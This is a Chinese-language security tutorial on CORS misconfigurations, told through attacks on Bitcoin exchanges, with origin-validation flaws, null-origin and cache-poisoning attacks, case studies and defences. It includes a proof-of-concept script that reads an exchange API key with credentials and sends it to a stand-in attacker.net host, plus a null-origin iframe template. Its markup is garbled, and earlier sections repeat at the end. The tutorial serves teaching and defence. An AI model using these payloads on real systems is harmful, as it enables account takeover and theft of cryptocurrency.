利用CORS配置错误漏洞攻击比特币交易所 - 详细教学文档<\/h1>

1. CORS基础概念<\/h2>

1.1 同源策略(SOP)<\/h3>
同源策略是浏览器实施的安全机制，限制来自不同源的文档或脚本如何交互。同源定义为协议、域名和端口完全相同。<\/p>

1.2 CORS机制<\/h3>
跨源资源共享(CORS)是一种放宽同源策略的机制，允许不同源的网站通过浏览器进行通信。<\/p>

2. CORS安全配置<\/h2>

2.1 基本CORS头部<\/h3>

Access-Control-Allow-Origin<\/code>: 指定允许访问资源的源<\/li>

Access-Control-Allow-Credentials<\/code>: 允许跨域请求携带凭据(cookie等)<\/li>
<\/ul>
2.2 危险配置模式<\/h3>


通配符配置<\/strong>:<\/p>
Access-Control-Allow-Origin: *
<\/span><\/span><\/span>Access-Control-Allow-Credentials: true
<\/span><\/span><\/span><\/code><\/pre>这种组合会被浏览器拒绝，是规范中的安全措施。<\/p>
<\/li>

动态Origin反射<\/strong>:

服务器根据请求中的Origin头部动态生成响应头，存在安全隐患。<\/p>
<\/li>
<\/ol>
3. CORS配置错误攻击技术<\/h2>
3.1 凭证窃取攻击<\/h3>
攻击条件<\/strong>:<\/p>

服务器动态反射Origin<\/li>
允许凭据传输(Allow-Credentials: true)<\/li>
<\/ul>
攻击步骤<\/strong>:<\/p>

构造恶意页面发送跨域请求<\/li>
窃取API密钥或敏感数据<\/li>
<\/ol>
示例POC代码<\/strong>:<\/p>
var<\/span> req<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>req<\/span>.onload<\/span> =<\/span> reqListener<\/span>;
<\/span><\/span>req<\/span>.open<\/span>('get'<\/span>,'https:\/\/btc-exchange\/api\/requestApiKey'<\/span>,true<\/span>);
<\/span><\/span>req<\/span>.withCredentials<\/span> =<\/span> true<\/span>;
<\/span><\/span>req<\/span>.send<\/span>();
<\/span><\/span>
<\/span><\/span>function<\/span> reqListener<\/span>() {
<\/span><\/span>  location<\/span>=<\/span>'\/\/attacker.net\/log?key='<\/span>+<\/span>this<\/span>.responseText<\/span>; 
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>3.2 Origin验证缺陷<\/h3>


后缀匹配漏洞<\/strong>:<\/p>

信任所有以特定字符串结尾的域名<\/li>
例如信任advisor.com<\/code>也会信任definitelynotadvisor.com<\/code><\/li>
<\/ul>
<\/li>

前缀匹配漏洞<\/strong>:<\/p>

信任所有以特定字符串开头的域名<\/li>
例如信任https:\/\/btc.net<\/code>也会信任https:\/\/btc.net.evil.net<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
3.3 null Origin攻击<\/h3>
触发条件<\/strong>:<\/p>

服务器将null<\/code>列入白名单<\/li>
可通过沙箱iframe获取null Origin<\/li>
<\/ul>
攻击方法<\/strong>:<\/p>
<iframe<\/span> sandbox<\/span>=<\/span>"allow-scripts allow-top-navigation allow-forms"<\/span> 
<\/span><\/span>        src<\/span>=<\/span>'data:text\/html,<script>\/*cors stuff here*\/<\/script>'<\/span>>
<\/span><\/span><\/iframe<\/span>>
<\/span><\/span><\/code><\/pre>3.4 协议不匹配攻击<\/h3>

HTTPS站点接受HTTP源的CORS请求<\/li>
可通过MITM攻击绕过HTTPS保护<\/li>
<\/ul>
4. 缓存相关攻击<\/h2>
4.1 客户端缓存中毒<\/h3>
攻击条件<\/strong>:<\/p>

存在反射型XSS漏洞<\/li>
未设置Vary: Origin<\/code>头部<\/li>
响应可被缓存<\/li>
<\/ul>
利用方法<\/strong>:<\/p>

通过CORS发送恶意请求<\/li>
恶意响应被缓存<\/li>
受害者访问时从缓存加载恶意内容<\/li>
<\/ol>
4.2 服务器端缓存中毒<\/h3>
攻击条件<\/strong>:<\/p>

存在HTTP头部注入漏洞<\/li>
服务器不检查Origin中的非法字符<\/li>
<\/ul>
IE\/Edge特有攻击<\/strong>:<\/p>

发送包含\r<\/code>的Origin头部<\/li>
IE\/Edge会将其视为头部终止符<\/li>
可导致字符集修改等攻击<\/li>
<\/ul>
5. 实际案例分析<\/h2>
5.1 比特币交易所攻击案例<\/h3>


案例1<\/strong>:<\/p>

动态反射任意Origin<\/li>
可窃取API密钥<\/li>
攻击者可转移比特币、启用2FA锁定账户<\/li>
<\/ul>
<\/li>

案例2<\/strong>:<\/p>

信任null Origin<\/li>
可窃取钱包加密备份<\/li>
可进行离线暴力破解<\/li>
<\/ul>
<\/li>

案例3<\/strong>:<\/p>

前缀匹配漏洞<\/li>
网站突然关闭(可能已被攻击)<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御措施<\/h2>
6.1 安全配置建议<\/h3>


严格Origin验证<\/strong>:<\/p>

维护精确的白名单<\/li>
避免动态反射<\/li>
避免通配符和null<\/li>
<\/ul>
<\/li>

必要头部设置<\/strong>:<\/p>
Vary: Origin
<\/span><\/span><\/span>Access-Control-Allow-Origin: https:\/\/trusted.example.com
<\/span><\/span><\/span><\/code><\/pre><\/li>

协议一致性<\/strong>:<\/p>

HTTPS站点只接受HTTPS源的请求<\/li>
<\/ul>
<\/li>
<\/ol>
6.2 开发建议<\/h3>

避免动态生成CORS头部<\/li>
实施严格的输入验证<\/li>
考虑使用代理服务器处理跨域请求<\/li>
<\/ol>
7. 工具检测<\/h2>

Burp Suite扫描器可识别文中讨论的所有缺陷<\/li>
手动测试Origin反射和null Origin<\/li>
<\/ul>
8. 总结<\/h2>
CORS配置错误可能导致严重的安全问题，特别是当与凭证传输结合时。开发人员应严格验证Origin，避免动态反射，并理解规范中的安全限制。攻击者可以利用这些漏洞窃取敏感数据、绕过安全控制，甚至直接窃取加密货币资产。<\/p>

利用CORS配置错误漏洞攻击比特币交易所 - 详细教学文档<\/h1>

1. CORS基础概念<\/h2>

1.1 同源策略(SOP)<\/h3> 同源策略是浏览器实施的安全机制，限制来自不同源的文档或脚本如何交互。同源定义为协议、域名和端口完全相同。<\/p>

1.2 CORS机制<\/h3> 跨源资源共享(CORS)是一种放宽同源策略的机制，允许不同源的网站通过浏览器进行通信。<\/p>

2. CORS安全配置<\/h2>

4. 缓存相关攻击<\/h2>

5. 实际案例分析<\/h2>

6. 防御措施<\/h2>

1.1 同源策略(SOP)<\/h3>
同源策略是浏览器实施的安全机制，限制来自不同源的文档或脚本如何交互。同源定义为协议、域名和端口完全相同。<\/p>

1.2 CORS机制<\/h3>
跨源资源共享(CORS)是一种放宽同源策略的机制，允许不同源的网站通过浏览器进行通信。<\/p>